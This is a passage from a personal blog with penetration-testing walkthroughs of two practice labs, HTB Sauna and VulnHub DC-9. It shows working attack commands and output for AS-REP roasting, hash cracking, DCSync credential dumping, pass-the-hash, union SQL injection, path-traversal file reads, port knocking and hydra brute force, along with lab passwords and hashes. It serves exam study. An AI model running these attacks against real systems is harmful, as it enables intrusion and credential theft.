<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">impacket-GetNPUsers 'EGOTISTICAL-BANK.LOCAL/' -userfile users.txt -format hashcat -outputfile hash -dc-ip 10.10.10.175</span><br><span class="line"></span><br><span class="line">[email protected]:6917e50f638536dc4a8acec7903dc045$2b03faaa6ed126e97cbc936ab835e16b6a2c185bded1e4f679985c6adcb993ad7b843a05e6fe0ccaa35a9f8d196d161d3b0335a6eaf21e1c4d943d4ad0fba1dcc07283c3172b6eb2ca0f2123f0efb81a517b1a8ca2b6973fd073dff3b67a02961060f232c99e1985aeb80c6d0c7a803cf84c6c8122610c3297f1decc329601aaeec33c92a25c32574d1537e11c09fbdc2c1169d381bdf2864f3a6ff27b457d41df8c0b1b010d5a1b5a2bbf1bd08f3a0259aa5a79ca27a408bf40497c37ecd733425d907c0ad4fc87fbdef0c417718adfe0377123821694223dc850bb23e67edc9afd8254822d24b8f0220c20dd7d0f327937439a1b9284a596c15d49fd9adc97</span><br></pre></td></tr></table></figure>
<p>crack hash</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt --force</span><br><span class="line"></span><br><span class="line">[email protected]:6917e50f638536dc4a8acec7903dc045$2b03faaa6ed126e97cbc936ab835e16b6a2c185bded1e4f679985c6adcb993ad7b843a05e6fe0ccaa35a9f8d196d161d3b0335a6eaf21e1c4d943d4ad0fba1dcc07283c3172b6eb2ca0f2123f0efb81a517b1a8ca2b6973fd073dff3b67a02961060f232c99e1985aeb80c6d0c7a803cf84c6c8122610c3297f1decc329601aaeec33c92a25c32574d1537e11c09fbdc2c1169d381bdf2864f3a6ff27b457d41df8c0b1b010d5a1b5a2bbf1bd08f3a0259aa5a79ca27a408bf40497c37ecd733425d907c0ad4fc87fbdef0c417718adfe0377123821694223dc850bb23e67edc9afd8254822d24b8f0220c20dd7d0f327937439a1b9284a596c15d49fd9adc97:Thestrokes23</span><br></pre></td></tr></table></figure>
<h3 id="Evil-winrm"><a href="#Evil-winrm" class="headerlink" title="Evil-winrm"></a>Evil-winrm</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23</span><br></pre></td></tr></table></figure>
<p>And user.txt is in C:\Users\FSmith\desktop</p>
<img src="/undefined/55527558/user.png" class="">
<h2 id="Priv-fsmith-–-gt-svc-loanmgr"><a href="#Priv-fsmith-–-gt-svc-loanmgr" class="headerlink" title="Priv: fsmith –> svc_loanmgr"></a>Priv: fsmith –> svc_loanmgr</h2><p>using smbserver.py to transfer tools like <code>winpeas.exe</code> to get information.</p>
<p>on attack host:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">impacket-smbserver share . -smb2support</span><br></pre></td></tr></table></figure>
<p>on victim host:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">copy \\\\10.10.16.2\\share\winpeas.exe</span><br></pre></td></tr></table></figure>
<p>then we get a information like this</p>
<img src="/undefined/55527558/svc_loadnmanager.png" class="">
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">*Evil-WinRM* PS C:\> net user</span><br><span class="line"></span><br><span class="line">User accounts for \\ </span><br><span class="line"></span><br><span class="line">-------------------------------------------------------------------------------</span><br><span class="line">Administrator FSmith Guest</span><br><span class="line">HSmith krbtgt svc_loanmgr</span><br><span class="line">The command completed with one or more errors.</span><br></pre></td></tr></table></figure>
<p>evil-winrm to svc-loanmgr</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">evil-winrm -i 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'</span><br></pre></td></tr></table></figure>
<h2 id="Priv-svc-loanmgr-–-gt-root"><a href="#Priv-svc-loanmgr-–-gt-root" class="headerlink" title="Priv: svc_loanmgr –> root"></a>Priv: svc_loanmgr –> root</h2><h3 id="Bloodhound"><a href="#Bloodhound" class="headerlink" title="Bloodhound"></a>Bloodhound</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bloodhound.py -c all -u svc_loanmgr -p 'Moneymakestheworldgoround!' -ns 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL --zip</span><br></pre></td></tr></table></figure>
<p>then load zip-file to bloodhound</p>
<h3 id="Analyze-result"><a href="#Analyze-result" class="headerlink" title="Analyze result"></a>Analyze result</h3><img src="/undefined/55527558/image-20230507220204297.png" class="">
<img src="/undefined/55527558/image-20230507220209450.png" class="">
<p>Through Bloodhound,we find that svc_loanmgr has dsync priviliege to domain.so just using <code>secretdump.py</code>.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">impacket-secretdump 'svc_loanmgr:[email protected]'</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::</span><br><span class="line">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</span><br><span class="line">krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::</span><br><span class="line">EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::</span><br><span class="line">EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::</span><br><span class="line">EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::</span><br><span class="line">SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:49f07e880c2babbb9f51fd264c51f979:::</span><br><span class="line"><SNIP></span><br></pre></td></tr></table></figure>
<h3 id="PTH"><a href="#PTH" class="headerlink" title="PTH"></a>PTH</h3><p>evil-winrm</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">evil-winrm -i 10.10.10.175 -u Administator -H 823452073d75b9d1cf70ebdf86c7f98e</span><br></pre></td></tr></table></figure>
<p>wmiexec</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">impacket-wmiexec -hashes 'aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e' -dc-ip 10.10.10.175 [email protected]</span><br></pre></td></tr></table></figure>
<p>or using other ways.</p>
<p>Finally get root.txt</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">C:\users\administrator\desktop>type root.txt</span><br></pre></td></tr></table></figure>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
<article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
<link itemprop="mainEntityOfPage" href="http://example.com/undefined/50abf7e1.html">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.gif">
<meta itemprop="name" content="So1Lupus">
<meta itemprop="description" content="So1Lupus的个人博客">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="So1Lupus">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/undefined/50abf7e1.html" class="post-title-link" itemprop="url">Road-to-OSCP-5-DC09</a>
</h2>
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建时间:2023-04-13 11:51:30" itemprop="dateCreated datePublished" datetime="2023-04-13T11:51:30+08:00">2023-04-13</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar-check"></i>
</span>
<span class="post-meta-item-text">更新于</span>
<time title="修改时间:2024-09-28 20:29:16" itemprop="dateModified" datetime="2024-09-28T20:29:16+08:00">2024-09-28</time>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<span id="more"></span>
<h1 id="VULHUB-DC09-Walkthrough"><a href="#VULHUB-DC09-Walkthrough" class="headerlink" title="VULHUB-DC09-Walkthrough"></a>VULHUB-DC09-Walkthrough</h1><h2 id="Information"><a href="#Information" class="headerlink" title="Information"></a>Information</h2><p>DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.</p>
<p>The ultimate goal of this challenge is to get root and to read the one and only flag.</p>
<p>Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.</p>
<h2 id="Recon"><a href="#Recon" class="headerlink" title="Recon"></a>Recon</h2><h3 id="IP"><a href="#IP" class="headerlink" title="IP"></a>IP</h3><p>Firstly ,we should konw target’s IP.So we use nmap to detect it.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">$nmap -sn 192.168.137.0/24 </span><br><span class="line">Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-12 21:17 CST</span><br><span class="line">Nmap scan report for 192.168.137.2</span><br><span class="line">Host is up (0.00048s latency).</span><br><span class="line">Nmap scan report for 192.168.137.3</span><br><span class="line">Host is up (0.00043s latency).</span><br><span class="line">Nmap scan report for 192.168.137.4</span><br><span class="line">Host is up (0.00039s latency).</span><br><span class="line">Nmap done: 256 IP addresses (3 hosts up) scanned in 4.14 seconds</span><br></pre></td></tr></table></figure>
<p>And now we know it was 192.168.137.4.</p>
<h3 id="Port-x2F-Service"><a href="#Port-x2F-Service" class="headerlink" title="Port/Service"></a>Port/Service</h3><p>Time to run a TCP-SYN scan to scan for open TCP ports on targets:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo nmap --min-rate 10000 -p- 192.168.137.4 -oN dc9-tcp-nmap-1</span><br></pre></td></tr></table></figure>
<p>And we get such a result:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"> </span><br><span class="line">Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-12 21:34 CST</span><br><span class="line">Nmap scan report for 192.168.137.4</span><br><span class="line">Host is up (0.000071s latency).</span><br><span class="line">Not shown: 65533 closed tcp ports (reset)</span><br><span class="line">PORT STATE SERVICE</span><br><span class="line">22/tcp filtered ssh</span><br><span class="line">80/tcp open http</span><br><span class="line">MAC Address: 00:0C:29:10:DF:0B (VMware)</span><br><span class="line"></span><br><span class="line">Nmap done: 1 IP address (1 host up) scanned in 1.29 seconds</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>Then try to get more details for this two ports.Port 22 is filtered.Maybe there is a <strong>Port Knock</strong>.To tell the truth,i know that after searching in the Internet.Port 80 is open,so we can go web pentest later.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">nmap -sV -sC -p22,80 192.168.137.4 -oN dc9-tcp-nmap-2</span><br><span class="line">PORT STATE SERVICE VERSION</span><br><span class="line">22/tcp filtered ssh</span><br><span class="line">80/tcp open http Apache httpd 2.4.38 ((Debian))</span><br><span class="line">|_http-title: Example.com - Staff Details - Welcome</span><br><span class="line">|_http-server-header: Apache/2.4.38 (Debian)</span><br><span class="line"></span><br><span class="line">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line">Nmap done: 1 IP address (1 host up) scanned in 6.68 seconds</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">namp -sV --script=vuln -p22,80 192.168.137.4</span><br><span class="line">Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-12 21:41 CST</span><br><span class="line">Nmap scan report for 192.168.137.4</span><br><span class="line">Host is up (0.00036s latency).</span><br><span class="line"></span><br><span class="line">PORT STATE SERVICE</span><br><span class="line">22/tcp filtered ssh</span><br><span class="line">80/tcp open http</span><br><span class="line">|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.</span><br><span class="line">|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)</span><br><span class="line">| http-enum: </span><br><span class="line">| /css/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'</span><br><span class="line">|_ /includes/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'</span><br><span class="line">| http-csrf: </span><br><span class="line">| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.137.4</span><br><span class="line">| Found the following possible CSRF vulnerabilities: </span><br><span class="line">| </span><br><span class="line">| Path: http://192.168.137.4:80/search.php</span><br><span class="line">| Form id: </span><br><span class="line">| Form action: results.php</span><br><span class="line">| </span><br><span class="line">| Path: http://192.168.137.4:80/manage.php</span><br><span class="line">| Form id: </span><br><span class="line">|_ Form action: manage.php</span><br><span class="line">|_http-dombased-xss: Couldn't find any DOM based XSS.</span><br><span class="line"></span><br><span class="line">Nmap done: 1 IP address (1 host up) scanned in 31.20 seconds</span><br></pre></td></tr></table></figure>
<p>Now,we get some information about target like <code>results.php</code>,<code>manage.php</code>,etc.</p>
<h2 id="Web-pentest"><a href="#Web-pentest" class="headerlink" title="Web pentest"></a>Web pentest</h2><p>go web scan</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line">gobuster dir -u 192.168.137.4 -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt </span><br><span class="line">===============================================================</span><br><span class="line">Gobuster v3.3</span><br><span class="line">by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)</span><br><span class="line">===============================================================</span><br><span class="line">[+] Url: http://192.168.137.4</span><br><span class="line">[+] Method: GET</span><br><span class="line">[+] Threads: 10</span><br><span class="line">[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt</span><br><span class="line">[+] Negative Status codes: 404</span><br><span class="line">[+] User Agent: gobuster/3.3</span><br><span class="line">[+] Timeout: 10s</span><br><span class="line">===============================================================</span><br><span class="line">2023/04/12 21:44:17 Starting gobuster in directory enumeration mode</span><br><span class="line">===============================================================</span><br><span class="line">/index.php (Status: 200) [Size: 917]</span><br><span class="line">/search.php (Status: 200) [Size: 1091]</span><br><span class="line">/config.php (Status: 200) [Size: 0]</span><br><span class="line">/.htaccess (Status: 403) [Size: 278]</span><br><span class="line">/logout.php (Status: 302) [Size: 0] [--> manage.php]</span><br><span class="line">/. (Status: 200) [Size: 917]</span><br><span class="line">/.html (Status: 403) [Size: 278]</span><br><span class="line">/results.php (Status: 200) [Size: 1056]</span><br><span class="line">/.php (Status: 403) [Size: 278]</span><br><span class="line">/manage.php (Status: 200) [Size: 1210]</span><br><span class="line">/display.php (Status: 200) [Size: 2961]</span><br><span class="line">/welcome.php (Status: 302) [Size: 0] [--> manage.php]</span><br><span class="line">/.htpasswd (Status: 403) [Size: 278]</span><br><span class="line">/.htm (Status: 403) [Size: 278]</span><br><span class="line">/session.php (Status: 302) [Size: 0] [--> manage.php]</span><br><span class="line">/.htpasswds (Status: 403) [Size: 278]</span><br><span class="line">/.htgroup (Status: 403) [Size: 278]</span><br><span class="line">/wp-forum.phps (Status: 403) [Size: 278]</span><br><span class="line">/.htaccess.bak (Status: 403) [Size: 278]</span><br><span class="line">/.htuser (Status: 403) [Size: 278]</span><br><span class="line">/.ht (Status: 403) [Size: 278]</span><br><span class="line">/.htc (Status: 403) [Size: 278]</span><br><span class="line">/.htaccess.old (Status: 403) [Size: 278]</span><br><span class="line">/.htacess (Status: 403) [Size: 278]</span><br><span class="line">Progress: 20866 / 37051 (56.32%)[ERROR] 2023/04/12 21:44:19 [!] parse "http://192.168.137.4/directory\t\te.g.": net/url: invalid control character in URL</span><br><span class="line">Progress: 35281 / 37051 (95.22%)===============================================================</span><br><span class="line">2023/04/12 21:44:20 Finished</span><br><span class="line">============================================================</span><br></pre></td></tr></table></figure>
<p>Some interesting files were finded.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">/index.php (Status: 200) [Size: 917]</span><br><span class="line">/session.php (Status: 302) [Size: 0] [--> manage.php]</span><br><span class="line">/search.php (Status: 200) [Size: 1091]</span><br><span class="line">/config.php (Status: 200) [Size: 0]</span><br><span class="line">/logout.php (Status: 302) [Size: 0] [--> manage.php]</span><br><span class="line">/. (Status: 200) [Size: 917]</span><br><span class="line">/results.php (Status: 200) [Size: 1056]</span><br><span class="line">/manage.php (Status: 200) [Size: 1210]</span><br><span class="line">/display.php (Status: 200) [Size: 2961]</span><br><span class="line">/welcome.php (Status: 302) [Size: 0] [--> manage.php]</span><br></pre></td></tr></table></figure>
<p>So,let try them.</p>
<p>And when try session.php,in the response packet,we found it’s set-Cookie.</p>
<img src="/undefined/50abf7e1/image-20230412215235471.png" class="">
<p>So,i try to add it to request packet to login into the manage.php.And,you guess what,it success.</p>
<img src="/undefined/50abf7e1/image-20230412215351703.png" class="">
<p>Then,we find some text in this page<em>File does not exist</em>.So i wonder if there a LFI?And finally get it .</p>
<img src="/undefined/50abf7e1/image-20230412215538449.png" class="">
<p>Dump the username in localfile.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">marym</span><br><span class="line">julied</span><br><span class="line">fredf</span><br><span class="line">barneyr</span><br><span class="line">tomc</span><br><span class="line">jerrym</span><br><span class="line">wilmaf</span><br><span class="line">bettyr</span><br><span class="line">chandlerb</span><br><span class="line">joeyt</span><br><span class="line">rachelg</span><br><span class="line">rossg</span><br><span class="line">monicag</span><br><span class="line">phoebeb</span><br><span class="line">scoots</span><br><span class="line">janitor</span><br><span class="line">janitor2</span><br></pre></td></tr></table></figure>
<p>Then , I find a attack point in <strong>results.php</strong>,and that was SQL injection.</p>
<p>Firstly,i try.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">A' or 1=1;#</span><br></pre></td></tr></table></figure>
<img src="/undefined/50abf7e1/image-20230412220042466.png" class="">
<p>So i continue with <strong>union</strong>.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">A' union select 1,2,3,4,5,6;#</span><br></pre></td></tr></table></figure>
<img src="/undefined/50abf7e1/image-20230412220335949.png" class="">
<p>After test,i find it can’t Display multiple lines of information.So we can use <em>group_concat()</em> to bypass that.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">A' union select 1,2,3,4,5,group_concat(0x7e,schema_name,0x7e) from information_schema.schemata</span><br></pre></td></tr></table></figure>
<img src="/undefined/50abf7e1/image-20230412221247878.png" class="">
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">A' union select 1,2,3,4,5,(select group_concat(0x7e,table_name,0x7e) from information_schema.tables where table_schema=database());#</span><br></pre></td></tr></table></figure>
<img src="/undefined/50abf7e1/image-20230412220902699.png" class="">
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">A' union select 1,2,3,4,5,group_concat(0x7e,username,0x7e,password,0x7e) from users.UserDetails;#</span><br></pre></td></tr></table></figure>
<img src="/undefined/50abf7e1/image-20230412221104078.png" class="">
<p>dump password in localfile.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">3kfs86sfd</span><br><span class="line">468sfdfsd2</span><br><span class="line">4sfd87sfd1</span><br><span class="line">RocksOff</span><br><span class="line">TC&TheBoyz</span><br><span class="line">B8m#48sd</span><br><span class="line">Pebbles</span><br><span class="line">BamBam01</span><br><span class="line">UrAG0D!</span><br><span class="line">Passw0rd</span><br><span class="line">yN72#dsd</span><br><span class="line">ILoveRachel</span><br><span class="line">3248dsds7s</span><br><span class="line">smellycats</span><br><span class="line">YR3BVxxxw87</span><br><span class="line">Ilovepeepee</span><br></pre></td></tr></table></figure>
<h2 id="Port-Knocking"><a href="#Port-Knocking" class="headerlink" title="Port Knocking"></a>Port Knocking</h2><p>Remember the filtered SSH port which might indicated a Port Knocking method is used? As we now have access to the file system of our target, we can try to locate the <em>knockd.conf</em> configuration file located by default at <em>/etc/</em> folder. This means our URL should be:<br> <code>http://192.168.137.4/manage.php?file=../../../../../../../../etc/knockd.conf</code></p>
<img src="/undefined/50abf7e1/image-20230412221532885.png" class="">
<p>Now we know the order of ports we need to hit with SYN packets in order to open the SSH port - 7469,8475 and lastly 9842 port. Keep in mind the order is important!</p>
<p>We can use on of the follwoing methods:</p>
<ol>
<li><p><a target="_blank" rel="noopener" href="https://linux.die.net/man/1/knockd">knockd</a> - Need to be installed.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">knock 192.168.137.4 7469 8475 9842</span><br></pre></td></tr></table></figure>
</li>
<li><p><a target="_blank" rel="noopener" href="https://tools.kali.org/information-gathering/hping3">hping3</a> - pre-instlled on Kali. Use the following command to send 1 SYN packet to each port:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hping3 -S 10.0.0.235 -p 7469 -c 1; hping3 -S 10.0.0.235 -p 8475 -c 1; hping3 -S 10.0.0.235 -p 9842 -c 1</span><br></pre></td></tr></table></figure>
</li>
<li><p><a target="_blank" rel="noopener" href="https://en.wikipedia.org/wiki/Netcat">netcat</a> - I’ll use this method as it is (manual but) easy.<br>We need to hit the port and CTRL+C in order to end the connection and move over to the next port.</p>
</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">nc 192.168.137.4 7469</span><br><span class="line">nc 192.168.137.4 8475 </span><br><span class="line">nc 192.168.137.4 9842 </span><br></pre></td></tr></table></figure>
<p>then port 22 is open.</p>
<h2 id="SSH-brute"><a href="#SSH-brute" class="headerlink" title="SSH brute"></a>SSH brute</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">hydra -L username -P password ssh://192.168.137.4</span><br><span class="line"></span><br><span class="line">[22][ssh] host: 192.168.137.4 login: chandlerb password: UrAG0D! </span><br><span class="line">[22][ssh] host: 192.168.137.4 login: joeyt password: Passw0rd [22][ssh] host: 192.168.137.4 login: janitor password: Ilovepeepee</span><br></pre></td></tr></table></figure>
<p>Got three valid username:password.</p>
<p>ssh login.And we find new passoword when i login as janitor in <code>/home/janitor/.secrets-for-putin/passwords-found-on-post-it-notes.txt</code>.Then add it to password file.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">3kfs86sfd</span><br><span class="line">468sfdfsd2</span><br><span class="line">4sfd87sfd1</span><br><span class="line">RocksOff</span><br><span class="line">TC&TheBoyz</span><br><span class="line">B8m#48sd</span><br><span class="line">Pebbles</span><br><span class="line">BamBam01</span><br><span class="line">UrAG0D!</span><br><span class="line">Passw0rd</span><br><span class="line">yN72#dsd</span><br><span class="line">ILoveRachel</span><br><span class="line">3248dsds7s</span><br><span class="line">smellycats</span><br><span class="line">YR3BVxxxw87</span><br><span class="line">Ilovepeepee</span><br><span class="line">Hawaii-Five-0</span><br><span class="line">BamBam01</span><br><span class="line">Passw0rd</span><br><span class="line">smellycats</span><br><span class="line">P0Lic#10-4</span><br><span class="line">B4-Tru3-001</span><br><span class="line">4uGU5T-NiGHts</span><br></pre></td></tr></table></figure>
<p>back to brute.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">hydra -L username -P password ssh://192.168.137.4</span><br><span class="line"></span><br><span class="line">[22][ssh] host: 192.168.137.4 login: chandlerb password: UrAG0D! </span><br><span class="line">[22][ssh] host: 192.168.137.4 login: joeyt password: Passw0rd [22][ssh] host: 192.168.137.4 login: janitor password: Ilovepeepee</span><br><span class="line">[22][ssh] host: 192.168.137.4 login: fredf password: B4-Tru3-001</span><br></pre></td></tr></table></figure>
<h2 id="Privilege-up"><a href="#Privilege-up" class="headerlink" title="Privilege up"></a>Privilege up</h2><p>uh,a new one.login and <code>sudo -l</code>.</p>
